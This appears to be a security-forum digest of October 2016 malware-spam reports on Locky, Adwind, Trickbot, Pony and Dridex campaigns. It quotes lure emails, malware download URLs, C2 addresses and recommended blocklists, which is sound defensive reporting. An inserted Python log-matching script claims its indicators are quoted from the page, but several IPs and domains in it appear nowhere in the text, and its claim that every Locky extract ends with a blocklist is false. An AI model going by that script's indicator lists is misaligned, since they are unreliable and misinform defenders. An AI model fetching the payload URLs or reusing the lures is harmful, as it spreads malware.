Fake 'Help Desk' SPAM - leads to Adwind
- http://blog.dynamoo.com/2016/10/malware-spam-western-union-help-desk.html
26 Oct 2016 - "Just by way of a change, here's some -malspam- that doesn't lead to Locky:

Screenshot: https://3.bp.blogspot.com/-dlvhqYrM...rwDeXYquGIY5GqH5FqLaQEkRlp7wCLcB/s1600/wu.png

In this case, the link in the email goes to:
linamhost .com/host/Western_Union_Agent_Statement_and_summary_pdf.jar
This is a Java file - if you don't have Java installed on your PC (and why would you want this 1990s relic anyway?) then it -won't- run. VirusTotal* identifies it as the Adwind Backdoor**. The Malwr report[3] shows it attempting to contact:
boscpakloka .myvnc .com [158.69.56.128] (OVH, US)
A whole bunch of components are downloaded and frankly I haven't had time to look, but it shares characteristics with the one reported at Malware-Traffic-Analysis[4]. Check the Dropped Files section of the Malwr Report[3] for more. Personally, I recommend blocking -all- dynamic DNS domains such as myvnc .com in corporate environments. At the very least I recommend blocking 158.69.56.128."
* https://virustotal.com/en/file/51d0...ed24fffb8e5cf1e7aa75ede2/analysis/1477480451/

** https://www.f-secure.com/v-descs/backdoor_java_adwind.shtml

3] https://malwr.com/analysis/ZGJmZTZmODg1Y2IxNGY1ODlkZmUxNmYzMTdmNjg2MDE/
Hosts
158.69.56.128: https://www.virustotal.com/en/ip-address/158.69.56.128/information/
>> https://www.virustotal.com/en/url/5...a7f9d3a6638febb06463f2dc498fd20e69c/analysis/

4] http://www.malware-traffic-analysis.net/2016/10/23/index2.html

myvnc .com: 8.23.224.108: https://www.virustotal.com/en/ip-address/8.23.224.108/information/
>> https://www.virustotal.com/en/url/a...10ac06174239692add1fce57478f4e01802/analysis/
___

Fake 'Your order' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-your-order-has-been.html
26 Oct 2016 - "This curiously worded spam email leads to Locky ransomware:
Subject: Your order has been proceeded
From: Elijah Farrell
Date: Wednesday, 26 October 2016, 12:41
Your order has been proceeded.
Attached is the invoice for your order 2026326638.
Kindly keep the slip in case you would like to return or state your product's warranty.


The name of the sender is randomly generated, as is the reference number. Attached is a ZIP file beginning with "order_details_" plus a random sequence, containing a malicious .VBS script with a similar name. The various scripts download a component... (thank you to my usual source for this)
(Long list of domain-names at the dynamoo URL above.)
The downloaded binary then phones home to:
78.46.170.94/linuxsucks .php [hostname: k-42 .ru] (Corem, Russia / Hetzner, Germany)
95.46.98.25/linuxsucks .php [hostname: 97623-vds-artem.kotyuzhanskiy.gmhost .hosting] (Mulgin Alexander Sergeevich aka GMHost, Ukraine)
91.226.92.225/linuxsucks .php [hostname: weblinks-3424 .ru] (Sobis, Russia)
It also tries to phone home...
Recommended blocklist:
78.46.170.64/27
95.46.98.0/23
91.226.92.225
"

- https://myonlinesecurity.co.uk/your-order-has-been-proceeded-malspam-delivers-locky/
26 Oct 2016 - "... Locky downloader.. which is running concurrently with THIS[1] is an email with the subject of 'Your order has been proceeded' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with order_details containing a vbs file... typical subject line is 'Your order has been processed' -not- 'Your order has been proceeded'...
1] https://myonlinesecurity.co.uk/invoice-350797-93872806-090-9b5248a-malspam-delivers-locky/
... One of the emails looks like:
From: Alex Gonzalez <Gonzalez.46337@ solardelaluna .com>
Date: Wed 26/10/2016 12:35
Subject: Your order has been proceeded
Attachment: order_details_56f220432.zip
Your order has been proceeded. Attached is the invoice for your order 9563076204. Kindly keep the slip in case you would like to return or state your product’s warranty.


26 October 2016: order_details_56f220432.zip: Extracts to: order details 144BAA.vbs
Current Virus total detections 6/54*. MALWR** shows a download of an encrypted file from
http ://hankookm.com/lun77kyf which is transformed by the script to q3SAQ4aZNZ0p.dll ...
C2 are http ://95.46.98.25 /linuxsucks.php and http ://umjjvccteg .biz/linuxsucks.php
Payload Security[3] shows several others as well... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...7d26a96347223f43ab2f1ab4/analysis/1477482479/

** https://malwr.com/analysis/NzE2YWY2YTkyNDczNDNhMmE3NmE3ZWRjYjkyMTBlNzE/
Hosts
101.79.129.33
95.46.98.25
78.46.170.94
91.226.92.225
69.195.129.70


3] https://www.hybrid-analysis.com/sam...6447d26a96347223f43ab2f1ab4?environmentId=100
Contacted Hosts
173.254.70.156
95.46.98.25
91.226.92.225
78.46.170.94

___

Fake 'Invoice' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/invoice-350797-93872806-090-9b5248a-malspam-delivers-locky/
26 Oct 2016 - "... Locky downloader.. an email with the subject of 'Invoice-350797-93872806-090-9B5248A' (random numbers) pretending to come from invoice@ random companies and email addresses with a random numbered invoice zip attachment containing a jse file... One of the emails looks like:
From: invoices@ greyport .net
Date: Wed 26/10/2016 12:35
Subject: Invoice-350797-93872806-090-9B5248A
Attachment: 20161026_93872806_Invoice.zip
Dear Customer,
Please find attached Invoice 93872806 for your attention.
Should you have any Invoice related queries please do not hesitate to contact either your designated Credit Controller or the Main Credit Dept. on 01635 279370.
For Pricing or other general enquiries please contact your local Sales Team.
Yours Faithfully,
Credit Dept’ ...


26 October 2016: 20161026_93872806_Invoice.zip: Extracts to: 167402123_Invoice.jse
Current Virus total detections 7/55*. MALWR was unable to show any connections or downloads. Payload Security** shows a download of an encrypted file from
glyderm .com.ph/t76f3g?awKAvfeuvvV=PyooUmcME but doesn’t show or allow download of the actual Locky binary... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...3fa75460d8322abaae14e889/analysis/1477481832/

** https://www.hybrid-analysis.com/sam...c383fa75460d8322abaae14e889?environmentId=100
Contacted Hosts
162.214.20.198
91.200.14.124
144.76.177.194
185.127.27.100
69.195.129.70
52.32.150.180
54.230.197.227

___

WhatsApp in-the-wild scams
- https://blog.malwarebytes.com/cyber...sapp-users-warned-of-latest-in-the-wild-scam/
Oct 26, 2016

Other related post(s):
WhatsApp Elegant Gold Hits the Digital Catwalk
> https://blog.malwarebytes.com/cybercrime/2015/07/whatsapp-elegant-gold-hits-the-digital-catwalk/
Don’t Get Stuck on WhatsApp Stickers…
> https://blog.malwarebytes.com/cybercrime/2015/09/dont-get-stuck-on-whatsapp-stickers/
Scams, PUPs Target Would-be WhatsApp Voice Users
> https://blog.malwarebytes.com/cybercrime/2015/03/scams-pups-target-would-be-whatsapp-voice-users/
WhatsApp Hack Promises Messages, Delivers PUPs
> https://blog.malwarebytes.com/cybercrime/2014/02/whatsapp-hack-promises-messages-delivers-pups/
WhatsApp Spam Campaign Leads to Malware
> https://blog.malwarebytes.com/cybercrime/2014/02/whatsapp-spam-campaign-leads-to-malware/

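Every Locky extract above ends with the same two things a defender can act on: a handful of download hosts (URL plus a random query string, which dynamoo notes is appended per victim) and a C2 list that is always some IP plus /linuxsucks.php, followed by a recommended blocklist of IPs and CIDRs. The Python below is an added example, not code from dynamoo or myonlinesecurity, that refangs indicators copied in the page's own defanged form, loads the blocklists, and runs proxy-log lines past them. The log format (timestamp, client, method, URL) and the log lines are constructed; the IPs, hosts and CIDRs are the ones quoted above; treating myvnc.com as a dynamic-DNS suffix to block follows the Adwind post's advice and is the only entry in that list.

```python
"""Match proxy-log URLs against the Locky download/C2 indicators quoted above.

Added example (not from the quoted posts). Indicators are copied in the
defanged form used on the page and refanged here; log lines are constructed.
"""
import ipaddress
from urllib.parse import urlsplit

# Defanged exactly as quoted: 'http ://host .tld/path', 'IP/linuxsucks .php'.
DEFANGED_IOCS = [
    "http ://beyondhorizon .net/076wc?EVgYCyg=JQHYinB",
    "http ://gruffcrimp .com/352gr0",
    "109.234.35.215/linuxsucks .php",
    "91.200.14.124/linuxsucks .php",
    "185.102.136.77/linuxsucks .php",
    "81.177.22.221/linuxsucks.php",
]
# Recommended blocklists from the dynamoo extracts above (IPs and CIDRs).
BLOCKLIST = ["109.234.35.0/24", "91.200.14.124", "185.102.136.77", "81.177.22.221",
             "78.46.170.64/27", "95.46.98.0/23", "91.226.92.225"]
# Dynamic-DNS suffix dynamoo recommends blocking wholesale in corporate networks.
DYNDNS_SUFFIXES = ("myvnc.com",)

# Constructed sample proxy log: '<epoch> <client> <method> <url>'.
SAMPLE_PROXY_LOG = """\
1477318650.123 10.0.0.5 GET http://beyondhorizon.net/076wc?EVgYCyg=JQHYinB
1477318655.001 10.0.0.5 POST http://109.234.35.215/linuxsucks.php
1477318660.777 10.0.0.7 POST http://78.46.170.94/linuxsucks.php
1477318670.000 10.0.0.9 GET http://www.example.org/index.html
1477318680.000 10.0.0.9 GET http://boscpakloka.myvnc.com/
"""


def refang(ioc):
    """Undo the 'http ://' and 'host .tld' spacing used to defang the posts."""
    s = ioc.replace("http ://", "http://").replace("hxxp ://", "http://")
    return s.replace("hxxp://", "http://").replace(" .", ".").replace("[.]", ".")


def normalise(url):
    """Return (host, path) with scheme defaulted and the query dropped.

    The query is ignored on purpose: the download URLs carry a random query
    string per victim, so only host + path is stable enough to match on.
    """
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    return (parts.hostname or "").lower(), parts.path or "/"


IOC_SET = {normalise(refang(i)) for i in DEFANGED_IOCS}
NETS = [ipaddress.ip_network(n) for n in BLOCKLIST]  # bare IPs become /32


def classify_url(url):
    """Return the list of reasons a URL is suspicious (empty = no match)."""
    host, path = normalise(url)
    reasons = []
    if (host, path) in IOC_SET:
        reasons.append("known download/C2 URL")
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None
    if addr is not None:
        for net in NETS:
            if addr in net:
                reasons.append(f"host in blocklist {net}")
                break
    if path.lower() == "/linuxsucks.php":
        reasons.append("Locky C2 path")
    if addr is None and (host in DYNDNS_SUFFIXES
                         or host.endswith(tuple("." + s for s in DYNDNS_SUFFIXES))):
        reasons.append("dynamic DNS domain")
    return reasons


def scan_log(text):
    """Return (client, url, reasons) for every log line that matches something."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        _ts, client, _method, url = fields[:4]
        reasons = classify_url(url)
        if reasons:
            hits.append((client, url, reasons))
    return hits


if __name__ == "__main__":
    for client, url, reasons in scan_log(SAMPLE_PROXY_LOG):
        print(client, url, ", ".join(reasons))
```

The third sample line is 78.46.170.94, a C2 from the 'Your order' run that is not in the explicit IOC list but falls inside the recommended 78.46.170.64/27; it is caught by the CIDR match and by the /linuxsucks.php path, which is the point of keeping both checks.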
Fake 'Bill overdue', 'Account Reactivation', 'Order Details', 'E-TICKET' SPAM

FYI...

Fake 'Bill overdue' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/bill-overdue-fake-telephone-bill-malspam-delivers-locky-thor-version/
27 Oct 2016 - "... Locky downloader... an email with the subject of 'Bill overdue' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with detailed_bill containing a vbs file... One of the emails looks like:
From: Edmund Parks <Parks.390@ airtelbroadband .in>
Date: Thu 27/10/2016 09:11
Subject: Bill overdue
Attachment: detailed_bill_251752d.zip
This is from the Telephone Company to remind you that your bill is overdue. Please see the attached bill for the fine charge.


27 October 2016: detailed_bill_251752d.zip: Extracts to: detailed bill 1C938E2.vbs
Current Virus total detections 7/55*. MALWR** shows a download of an encrypted file from
http ://tahradeep .com/1tuqd which is transformed by the script to yNBjdb1LZklImF.dll (VirusTotal 11/57***).
C2 are http ://83.217.11.193 /linuxsucks.php | http ://91.201.42.24 /linuxsucks.php
Payload Security[4] shows a few different download locations for the encrypted files but no C2... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...e7d14a6157592ce2ecee7002/analysis/1477556155/

** https://malwr.com/analysis/ZTE3YTBhYzBhN2M4NDI5NmI2MjVhZTE0YWZiMmM2ODU/
Hosts
67.171.65.64
91.201.42.24
83.217.11.193


*** https://www.virustotal.com/en/file/...55db9d23ce3ec6a5c8d4f6a5/analysis/1477557085/

4] https://www.hybrid-analysis.com/sam...b54e7d14a6157592ce2ecee7002?environmentId=100
Contacted Hosts
67.171.65.64
119.29.37.110
122.114.89.157


- http://blog.dynamoo.com/2016/10/malware-spam-this-is-from-telephone.html
27 Oct 2016 - "This -fake- financial spam leads to Locky ransomware:
Subject: Bill overdue
From: Alexandria Maxwell
Date: Thursday, 27 October 2016, 9:35
This is from the Telephone Company to remind you that your bill is overdue.
Please see the attached bill for the fine charge.


The sender name varies. Attached is a ZIP file which in the sample I saw was named detailed_bill_a9ec14342.zip containing a malicious script... detailed bill C43A9.vbs. The Malwr Report* and Hybrid Analysis** for that script shows behaviour consistent with Locky ransomware, and my sources (thank you) tell me that the various scripts download...
(Long list of domain-names at the dynamoo URL above.)
... A DLL is dropped with a detection rate of 11/56***, and the malware then phones home to:
91.201.42.24/linuxsucks.php (RuWeb LLC, Russia)
83.217.11.193/linuxsucks.php [hostname: artkoty.fortest .website] (Park-Web Ltd, Russia)
91.230.211.150/linuxsucks.php [hostname: tarasik.freeopti .ru] (Optibit LLC, Russia)
Recommended blocklist:
91.201.42.24
83.217.11.193
91.230.211.150
"

* https://malwr.com/analysis/OWUyNjBhNjhjMDk1NGZlNzg3OGJlMWZkNDI0YTNmMDM/
Hosts
92.53.96.20
91.201.42.24
83.217.11.193


** https://www.hybrid-analysis.com/sam...8ac5e980bfc8763f9bf270c6eaf?environmentId=100
Contacted Hosts
67.171.65.64
83.217.11.193
91.230.211.150
91.201.42.24


*** https://virustotal.com/en/file/f81d...8265c78c1b7f5972a74e5e9e/analysis/1477560896/
___

Fake 'Account Reactivation' SPAM - delivers java adwind
- https://myonlinesecurity.co.uk/account-reactivation-western-union-malspam-delivers-java-adwind/
27 Oct 2016 - "... -fake- financial themed emails containing java adwind attachments... The email looks like:
From: Npc@ westernunion .com <accounts@ petnet .com .ph>
Date: Thu 27/10/2016 04:56
Subject: Account Reactivation
Attachment: Account Reactivation.zip
Dear Agent,
Our security team has detected a hacking attempt on your account /Terminal . Luckily, the attempt has been blocked and the account/ terminal has been suspended with no financial loss.
Now in order to reactivate the account and avoid the recurrence of such incident, we strongly recommend that you follow the reactivation process attached and share the outcome with our security team copied.
Let us know if you have any questions.
Kind regards,
Zineb Abdouss
Sr. Regional Operations Specialist, North, and Western Asia
Western Union
7th floor, shore 13
1100 Boulevard Al Qods-Quartier Sidi Maarouf
20270 Casablanca – Morocco ...


27 October 2016: Account Reactivation manual.jar (119kb) - Current Virus total detections 22/56*. MALWR**...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...a10aeddf707c92ea4e949fa5/analysis/1477547372/

** https://malwr.com/analysis/ZjI2YTVjODZlMzc2NDU4Y2IxOGZkZDNlMjZmZGM3MzM/
Hosts
216.107.152.224
___

Fake 'Order Details' SPAM - delivers malware
- https://myonlinesecurity.co.uk/jame...s-delivers-malware-via-malicious-office-docs/
27 Oct 2016 - "An email with the subject of 'Re: Order Details' pretending to come from James Correy <jamescorrey@ gmail .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Update: I am reliably informed it is a pony dropper with the pony binary embedded inside the word doc using
http ://www .octpendant .org.in/chixthree-18oct-18nov/gate.php

27 October 2016: BL-06038711.DOC - Current Virus total detections 11/54*... a manual analysis of the macro enabled doc shows a connection to http ://travelinsider .com.au/021ygs7 which currently gives a php error... opens in Microsoft word with a message to 'enable editing to see content'... Payload Security** does show an informative download of an .exe file JF.cm d which VirusTotal 15/56*** detects...
> https://myonlinesecurity.co.uk/wp-c...dynamic-content-plugin-missing-1-1024x306.png

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2016/10/james-correy-order-detail-1024x621.png

... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...30c2388a0e3315cfa75bbeaf/analysis/1477547380/

** https://www.hybrid-analysis.com/sam...f6d30c2388a0e3315cfa75bbeaf?environmentId=100

*** https://www.virustotal.com/en/file/...09dbbb350a9d9dcb89315c00/analysis/1477548223/
___

Fake 'E-TICKET' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-e-ticket-41648-leads-to.html
27 Oct 2016 - "More Locky ransomware today..
From "Matthew standaloft"
Date Thu, 27 Oct 2016 15:20:27 +0530
Subject E-TICKET 41648
Dear Sir ,
Please find the attached E-ticket as per your requested.
Thanks & Regards ,
Matthew standaloft


Attached is a ZIP file containing a randomly-named .WSF script, downloading more evil... (according to my usual source):
(Long list of domain-names at the dynamoo URL above.)
... This drops a malicious DLL with a detection rate of 9/56*. The following C2 servers are contacted:
83.217.11.193/linuxsucks .php [hostname: artkoty.fortest .website] (Park-Web Ltd, Russia)
91.201.202.12/linuxsucks .php (FLP Anoprienko Artem Arkadevich aka host-ua .com, Ukraine)
213.159.214.86/linuxsucks .php (JSC Server, Russia)
Recommended blocklist (also see this other spam run** today):
83.217.11.193
91.201.202.12
213.159.214.86
"
* https://www.virustotal.com/en/file/...b3c05dcc06ed07b7dc47b57068798328277/analysis/

** http://blog.dynamoo.com/2016/10/malware-spam-this-is-from-telephone.html

- https://myonlinesecurity.co.uk/e-ticket-malspam-delivers-locky-thor-version/
27 Oct 2016 - "... Locky downloader... an email with the subject of 'E-TICKET 0385' (random numbers) coming as usual from random companies, names and email addresses with a semi-random numbered zip attachment that matches the subject number containing a random numbered wsf file... One of the emails looks like:
From: Jacqueline lewis <Jacqueline.lewis022@ pro-youthrodeo .org>
Date: Thu 01/09/2016 19:22
Subject: E-TICKET 0385
Attachment: 0385.zip
Dear Sir ,
Please find the attached E-ticket as per your requested.
Thanks & Regards ,
Jacqueline lewis


27 October 2016: 0385.zip: Extracts to: 8910682.wsf - Current Virus total detections 9/55*
MALWR** shows a download of an encrypted file from http ://139.162.29.193 /g67eihnrv?mieVBwvCQ=ExHBtOmHHgv
which is transformed by the script to mujVqbry1.dll (VirusTotal 9/56***). C2 is:
http ://83.217.11.193 /linuxsucks.php
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...ba0748655f8bc38aa223b021/analysis/1477560672/

** https://malwr.com/analysis/NGVmYjM5ZjlhOWJhNGVlMzhhNDg3MjQyZTI2YWRlM2U/
Hosts
139.162.29.193
83.217.11.193


*** https://www.virustotal.com/en/file/...d07b7dc47b57068798328277/analysis/1477559703/
___

Fake 'Receipt' SPAM - delivers locky
- https://myonlinesecurity.co.uk/blank-email-receipt-malspam-delivers-locky-thor-version/
27 Oct 2016 - "... Locky downloader... a -blank- email with the subject of 'Receipt' 1578-92517 (random numbers) once again pretending to come from random names at Gmail .com with a semi-random named/numbered zip attachment matching the subject line containing a WSF file... One of the emails looks like:
From: ashley.baring@ gmail .com
Date: Thu 27/10/2016 15:15
Subject: Receipt 1578-92517
Attachment: Receipt 1578-92517.zip


Body content: completely blank/empty

27 October 2016: Receipt 1578-92517.zip: Extracts to: Receipt 89598-1810311.wsf
Current Virus total detections 13/55*. MALWR** shows a download of an encrypted file from
http ://www .acclaimenvironmental .co.uk/g67eihnrv?TCwKroMse=uwIrKcwhz which is transformed by the script to TQTOMcCTi1.dll (VirusTotal 7/57***). C2 http ://83.217.11.193 /linuxsucks.php. Payload Security[4] shows additional C2 locations... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...4a6abfc60db7b2239e5119eb/analysis/1477578664/

** https://malwr.com/analysis/ODdmMTZjNzk5OWM1NDRjMWFlNjViMjNmM2YwNTlhZWY/
Hosts
89.145.76.9
83.217.11.193


*** https://www.virustotal.com/en/file/...23da76b97ce9cb22c50f63bc/analysis/1477579336/

4] https://www.hybrid-analysis.com/sam...d9f4a6abfc60db7b2239e5119eb?environmentId=100
Contacted Hosts
89.145.76.9
213.159.214.86
83.217.11.193
91.201.202.12
192.42.116.41
52.32.150.180
54.192.11.30


Fake 'New fax received', 'Payment history', 'Document' SPAM, Dridex new '0-Day'

FYI...

Fake 'New fax received' SPAM - delivers Trickbot banking trojan
- https://myonlinesecurity.co.uk/important-new-fax-received-malspam-delivers-trickbot-banking-trojan/
28 Oct 2016 - "... unusual email with the subject of 'Important – New fax received' pretending to come from Administrator <Administrator@ internalfax .net> or Administrator <Administrator@ internalfax .com> with either a malicious word doc attachment or a zip file containing a .js file which downloads Trickbot banking Trojan...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2016/10/Important-New-fax-received-1024x545.png

Both emails pass all validation checks (SPF & DKIM), so they blow past spam filters, and -both- domains were newly registered -today- with the sole aim of spreading malware. Both domains are registered through and hosted by GoDaddy..

28 October 2016: InternalFax.js - Current Virus total detections 3/55*. MALWR** shows a download from
http ://www .tessaban .com/admin/images/jsjsjsihfsdkq.png which of course is -not- a png but a renamed .exe file. The JavaScript -renames- it to vQjiLVqR.exe and autoruns it. (VirusTotal 26/56***). Payload Security[4] was unable to contact any download sites or download the malware...

28 October 2016: InternalFax.doc - VirusTotal 2/52[5] | Payload Security[6] shows a download from
futuras .com/dodocdoddus .exe which is -renamed- to 10575.exe and autorun by the macro in the word doc
(VirusTotal 8/56[7]) MALWR[8] shows the downloads from either
http ://futuras .com/dodocdoddus.exe or http ://fax-download .com/lindoc1.exe
(fax-download .com registered -yesterday- 27 October 2016 and hosted on 23.95.37.89 host.colocrossing .com)...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."

futuras .com: 203.199.134.21: https://www.virustotal.com/en/ip-address/203.199.134.21/information/
>> https://www.virustotal.com/en/url/e...50ffa9b18d905940887243514a5c72471fe/analysis/

23.95.37.89: https://www.virustotal.com/en/ip-address/23.95.37.89/information/
>> https://www.virustotal.com/en/url/9...9e83e891319d1ca3c32c203c7117ad0d8cd/analysis/

* https://www.virustotal.com/en/file/...0edf30f06e6d70af6016788a/analysis/1477673159/

** https://malwr.com/analysis/Y2FhZTg2YWU3OTBkNGVjYmE5NzJjYzIyYjM1NmUxNzQ/
Hosts
61.19.247.54
78.47.139.102
91.219.28.77
8.254.207.62
193.9.28.24
37.1.209.51
138.201.44.28
188.116.23.98
104.250.138.194
80.79.114.179


*** https://www.virustotal.com/en/file/...0519973b0bfa1b4fb260a96d/analysis/1477671917/

4] https://www.hybrid-analysis.com/sam...93a0edf30f06e6d70af6016788a?environmentId=100
Contacted Hosts
61.19.247.54
78.47.139.102
91.219.28.77
80.79.114.179
193.124.177.117


5] https://www.virustotal.com/en/file/...0e9026fbbbfe7fcaa2f65ff1/analysis/1477672660/

6] https://www.hybrid-analysis.com/sam...3750e9026fbbbfe7fcaa2f65ff1?environmentId=100
Contacted Hosts
23.95.37.89
78.47.139.102
91.219.28.77
80.79.114.179
193.124.177.117


7] https://www.virustotal.com/en/file/...db30cc64be14e18c23e5b444/analysis/1477674272/

8] https://malwr.com/analysis/YjUwYzA0OGEyMmU0NGMzMDhmNzM5NzE0ZmVhODZhNmI/
Hosts
210.16.101.168
203.199.134.21
78.47.139.102
54.243.70.107
64.182.208.184
64.182.208.182
64.182.208.181
64.182.208.183
66.171.248.178
188.40.53.51
91.219.28.77
193.9.28.24

___

Fake 'Payment history' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/payment-history-malspam-delivers-locky-thor-version/
28 Oct 2016 - "... Locky downloader... an email with the subject of 'Payment history' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with payment_history containing a VBS file... This is very similar to last night’s Locky malspam[1] where the download is an actual executable file, not an encrypted file needing decoding, although called a txt file. The VBS just renames it to the dll name...
1] https://myonlinesecurity.co.uk/please-review-malspam-delivers-locky-thor-version/
One of the emails looks like:
From: Lionel Hall <Hall.748@ nrjleman .com>
Date: Fri 28/10/2016 09:58
Subject: Payment history
Attachment: payment_history_64b96be.zip
The payment history for the first week of October 2016 is attached as you requested. Please review it and let us know if you have any question.


28 October 2016: payment_history_64b96be.zip: Extracts to: payment history EE5B8 PDF.vbs
Current Virus total detections 8/54*. MALWR** shows a download of a file from
http ://92hanju .com /utl41nrt which is renamed by the script to r7vl3GrYKGPE0uLB0.dll (VirusTotal 12/56***).
C2 is http ://83.217.11.193 /linuxsucks.php . Payload Security[4] shows alternative download locations & C2 but for some strange reason isn’t showing the downloaded Locky binary as malicious... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...781717de7033ea5f9422560c/analysis/1477646733/

** https://malwr.com/analysis/M2IyNmIwYTBkZjdjNDViMWEyZDJkNjYwNTc0OTEzNjc/
Hosts
133.130.109.98
185.154.13.79
83.217.11.193


*** https://www.virustotal.com/en/file/...2696ac259c0e72874aa2fed9/analysis/1477647176/

4] https://www.hybrid-analysis.com/sam...2f3781717de7033ea5f9422560c?environmentId=100
Contacted Hosts
213.176.241.230
185.154.13.79
83.217.11.193
46.148.26.99
194.1.239.152
91.230.211.150


- http://blog.dynamoo.com/2016/10/malware-spam-payment-history-leads-to.html
28 Oct 2016 - "... another spam run pushing Locky ransomware:
Subject: Payment history
From: Theodore Wilkins
Date: Friday, 28 October 2016, 10:09
The payment history for the first week of October 2016 is attached as you requested.
Please review it and let us know if you have any question.


The sender name varies from message to message. Attached is a ZIP file named in a similar way to payment_history_aecca55b.zip containing a malicious VBS script... (e.g. payment history 6848D10A PDF.vbs). You can see some of the activities of these script in these automated analyses [1] [2].
There are many different variants of the script, downloading components...
(Many domain-names listed at the dynamoo URL above.)
... (Thank you to my usual source for this data). The malware phones home to:
83.217.11.193/linuxsucks .php [hostname: artkoty.fortest .website] (Park-web Ltd, Russia)
46.148.26.99/linuxsucks .php [hostname: tarasik1.infium .net] (Infium, UAB, Ukraine)
194.1.239.152/linuxsucks .php (Internet Hosting Ltd, Russia)
91.230.211.150/linuxsucks .php [hostname: tarasik.freeopti .ru] (Optibit LLC, Russia)
185.154.13.79/linuxsucks .php (Dunaevskiy Denis Leonidovich, Ukraine) ...
A DLL is dropped with a detection rate of 12/57*.
Recommended blocklist:
83.217.11.193
46.148.26.99
194.1.239.152
91.230.211.150
185.154.13.79
"
1] https://malwr.com/analysis/ZGFmYzVlM2YxYzQyNDM5YWFiNjNjNTNjZjRjNWQ4MmU/
Hosts
185.2.128.114
46.148.26.99


2] https://www.hybrid-analysis.com/sam...564c4221898fc69e5dc621ce10e?environmentId=100
Contacted Hosts
185.2.128.114
185.154.13.79
83.217.11.193
194.1.239.152
91.230.211.150
46.148.26.99


* https://virustotal.com/en/file/7f18...e15bad15df7c33c7d40ca243a6dcce904b6/analysis/
___

Fake 'Document' SPAM - delivers trickbot banking Trojan
- https://myonlinesecurity.co.uk/docu...ain-malspam-delivers-trickbot-banking-trojan/
28 Oct 2016 - "An email with the subject of 'Document' from random names pretending to come from random name <random.name@ victim domain .tld> with a malicious word doc attachment delivers a trickbot banking Trojan... This uses a somewhat complicated method of delivery to try to bypass antivirus and content protection, but basically the macro inside the word doc creates a lnk file, calls on powershell to run the lnk file which connects to the web server to download a file, which is in turn renamed, moved & autorun by the powershell instruction inside the macro. The alleged senders name matches the subject line, the name in the body of the email and the document name... The email looks like:
From: Tommy Griggs <Tommy.Griggs@ oneknight .co.uk>
Date: Fri 28/10/2016 02:37
Subject: Document from Griggs
Attachment: Griggs-2810-824.doc
My company sent you a document. Check it attached.
Regards,
Tommy Griggs
Challenger Limited


28 October 2016: Griggs-2810-824.doc - Current Virus total detections 3/53*
Payload Security** shows a download from futuras .com/ksdjgdfhmsc.exe (VirusTotal 12/57***)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...5e2ac74d4c3aa12d300ecf9b/analysis/1477637824/

** https://www.hybrid-analysis.com/sam...9935e2ac74d4c3aa12d300ecf9b?environmentId=100
Contacted Hosts
203.199.134.21
78.47.139.102
91.219.28.77
80.79.114.179
193.124.177.117


*** https://www.virustotal.com/en/file/...7084ab878a144ed5550d4e79/analysis/1477629101/
___

Dridex - new "0-Day-Distribution" method
- https://payload-security.blogspot.co.uk/2016/10/on-dridex-and-new-zero-day-distribution_27.html
Oct 27, 2016 - "The banking trojan Dridex (also known as Cridex, Feodo, Geodo, etc.) has been distributed in the past via malicious documents containing macros sent by E-Mail. Just yesterday we discovered a new distribution method that is undetected by the various Sandbox solutions we have access to and all AV engines. We were able to happily share and send those infected files via Skype, Gmail and other platforms. So while Dridex itself isn't new, the distribution method definitely is - and it will be very successful looking at current 0% detection ratio. In a sense, it is a "zero-day-distribution" method so we decided to use that term...
> https://3.bp.blogspot.com/-DTnOJp68...3edw1EP95-wy2o9EP18HBsCse5LACLcB/s1600/vt.png
As has been a recent trend we see for targeted attacks (more on that later), this malicious Office file does not contain any macros (or exploits, actually) to execute the payload... Instead, the document contains an embedded file, which can be extracted from the "oleObject1.bin" file in the "embeddings" folder. In this case, as it is a Word file, the relative pathway would be word/embeddings/oleObject1.bin... Simply opening the document will cause nothing to happen initially. Instead, the embedded file has to be double-clicked. This is the first "hurdle" that most Sandbox systems will have difficulties with:
> https://3.bp.blogspot.com/-4gHVNlGD...ura+de+pantalla+2016-10-26+a+las+19.50.17.png
After double-clicking the file - on a default configured system - an additional prompt will have to be passed:
> https://2.bp.blogspot.com/-sjrRV6nA...ura+de+pantalla+2016-10-26+a+las+20.26.36.png
... only if we -click- "Open" on that prompt, the actual LNK file and consequently the Command Prompt -> Powershell execution chain will trigger and download Dridex..."
(More detail at the payload-security URL above.)

>> https://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/
___

'Your Bill' is -Not- Overdue ... Locky
- https://isc.sans.edu/diary.html?storyid=21647
